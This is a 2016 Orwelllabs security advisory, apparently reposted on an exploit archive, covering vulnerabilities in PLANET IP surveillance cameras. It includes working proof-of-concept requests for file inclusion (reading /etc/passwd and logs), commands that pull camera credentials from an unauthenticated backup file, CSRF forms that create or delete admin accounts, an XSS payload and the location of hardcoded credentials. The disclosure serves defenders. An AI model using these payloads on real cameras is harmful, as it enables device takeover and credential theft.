Home / os / winmobile

PLANET IP LFI / CSRF / XSS / Authentication Bypass

Posted on 16 May 2016

_ _ _ _ | | | | | | ___ _ ____ _____| | | | __ _| |__ ___ / _ | '__ / / / _ | | |/ _` | '_ / __| | (_) | | V V / __/ | | | (_| | |_) \__ \___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/ Security Adivisory 2016-04-06 www.orwelllabs.com Twitter:@orwelllabs mantra: ...not affect a product that is in scope for... AhHum! Overview ======== Technical Risk: high Likelihood of Exploitation: medium Credits: Discovered and researched by Orwelllabs CVE-Number: N/A DWF: Submited Adivisory URL: http://www.orwelllabs.com/2016/02/planet -ip-surveillance-camera-local.html [1] Issues ===== I. Local File Inclusion (42 vectors) II. Arbitrary file read/Authentication bypass III. Sensitive information disclosure IV. Cross-site request forgery V. Reflected Cross-site scripting VI. hardcoded credentials I. Local File Inclusion ======================= * CLASS: External Control of File Name or Path [CWE-73] The Web Management interface of PLANET IP surveillance Cams models FW-ICA-2500, ICA-2250VT, ICA-4200V, ICA-4500V, ICA-3350V, ICA-5350V AND ICA-8350 and probably others is prone to Local File Include (LFI). PoC --- The request bellow is generated when a new user is added, in this case we are adding the following administrative credential for the cam: "winst0n: 0rw3lll4bs". GET /cgi-bin/admin/querylogin.cgi HTTP/1.1 Host: {xxx.xxx.xxx.xxx} User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=winst0n&pwd= 0rw3lll4bs&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp Cookie: ipcam_profile=1; tour_index=-1; IsHideStreamingStatus=yes Authorization: Basic YdRRtXW41YXRtad4= Connection: keep-alive If-Modified-Since: Mon, 08 Jul 2013 11:10:26 GMT If the value of the parameter "redirect" was changed to any system file will return the contents of that file, as shown below: http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=winst0n&pwd= 0rw3lll4bs&grp=administrator&sgrp=ptz&action=add&redirect=/etc/passwd In this case will retrieved the content of /etc/passwd Vectors: ------- There are a total of 42 vectors of LFI, the detailed results will be published in www.orwelllabs.com [1] soon. Basically all menus of the camera (shown below) to submit, add, modify and remove settings trigger the corresponding scripts to access resource that contains a parameter "redirect" which is also affected. [ ----------------------------] [ #1: Network ---------------] -> 9 [ #2: Camera ---------------] -> 3 [ #3: System -------------- ] -> 2 [ #4: Video -------------- ] -> 4 [ #5: Audio -------------- ] -> 1 [ #6: User -------------- ] -> 1 [ #7: Protocol ------------- ] -> 2 [ #8: E-Mail -------------- ] -> 1 [ #9: Event Detection ------ ] -> 1 [ #10: Storage -------------- ] -> 2 [ #11: Continuous Recording - ] -> 1 [ #12: Recording List ------- ] -> 0 [ #13: Event Server --------- ] -> 11 [ #14: Event Schedule ------- ] -> 4 [ ----------+--------------- ] II. Arbitrary file read/Authentication bypass ============================================= The camera offers a feature to perform the download settings via a backup file. However, (how acess control is not effective) this file remains accessible via the browser for an unauthenticated user. PoC --- wget --no-check-certificate https://{xxx.xxx.xxx.xxx}/backup.tar.gz tar -xzvf backup.tar.gz cat tmp/sysConfig/sysenv.cfg|strings|fmt|cut -f8,9 -d" " It will return the credential to access the camera Through this vulnerability a user can also obtain the credential of the AP to which the camera is connected just parsing the file: 'tmp/sysConfig/extra.info' III. Sensitive information disclosure ===================================== Using LFI vulnerability report, a user can obtain sensitive information such as username and password by reading the log file, as follows: {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=&pwd=&grp=&sgrp=&action=&redirect=/var/log/messages IV. Cross-site request forgery ============================== Planet IP cams ICA-* are prone to Multple CSRF. PoC ------ - This will create a admin credential: winst0n:0rw3lll4bs <html> <!-- Orwelllabs - PlanetIP -CSRF PoC - --> <body> <form action="http://{xxx.xxx.xxx.xxx}/setup.cgi?language=ie&adduser=winst0n :0rw3lll4bs:1"> <input type="submit" value="Submit form" /> </form> </body> </html> - ICA-5350V <html> <!-- Orwelllabs - PlanetIP -CSRF PoC - --> <body> <form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=winst0n &pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp"> <input type="submit" value="Submit form" /> </form> </body> </html> - Del user root <html> <!-- Orwelllabs - PlanetIP -CSRF PoC - --> <body> <form action="http:// {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=remove&redirect=asp%2Fuser.asp"> <input type="submit" value="Submit form" /> </form> </body> </html> V. Cross-Site Scripting ======================= Cams models ICA-* are prone to Multiple XSS POC ------- http://{xxx.xxx.xxx.xxx}/setup.cgi?<script>alert("XSS")</script> this will pop-up the message XSS in the browser VI. hardcoded credentials ========================= The credentials of web management can be found just viewing the source of page default_nets.htm: PoC ------ https://{xxx.xxx.xxx.xxx}/default_nets.htm code: } function av_onload(){ CheckMobileMode(); util_SetUserInfo(); Loadplay(); watchdog(); //alert("watchdog"); } function Loadplay(){ play("MasterUsr","MasterPwd","554",parseInt("99"),parseInt("99"),"1",parseInt("2"),parseInt("0"),"192.168.1.99",""); } Vulnerable Packages =================== ICA-2500 ICA-2250VT ICA-4200V ICA-4500V ICA-3350V ICA-5350V ICA-8350 Timeline ======== 2015-10-02 - Issues discovered 2015-11-30 - Vendor contacted (advisore sent) 2015-12-16 - Vendor contacted (asking for feedback about reported issues) 2015-12-17 - Vendor response (asking for more time to check issues) 2015-12-21 - RD team replied: can't duplicate vulnerabilities.... 2016-01-13 - Vendor contacted (submitted evidence that the vulnerabilities persist and can be reproduced.) ...and no news after that... Legal Notices +++++++++++++ The information contained within this advisory and in any other published by our lab is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. About Orwelllabs ++++++++++++++++ Orwelllabs is an independent security research lab interested in IoT, what means embedded devices and all its components like web applications, network, mobile applications and all surface areas prone to attack. Orwelllabs aims to study, learn and produce some intelligence around this vast and confusing big picture called smart cities. We have special appreciation for devices designed to provide security to these highly technological cities, also known as IoST. -----BEGIN PGP PUBLIC KEY BLOCK----- mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf 55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN 95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965 AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK 6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30 MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37 =IZYl -----END PGP PUBLIC KEY BLOCK-----

 

TOP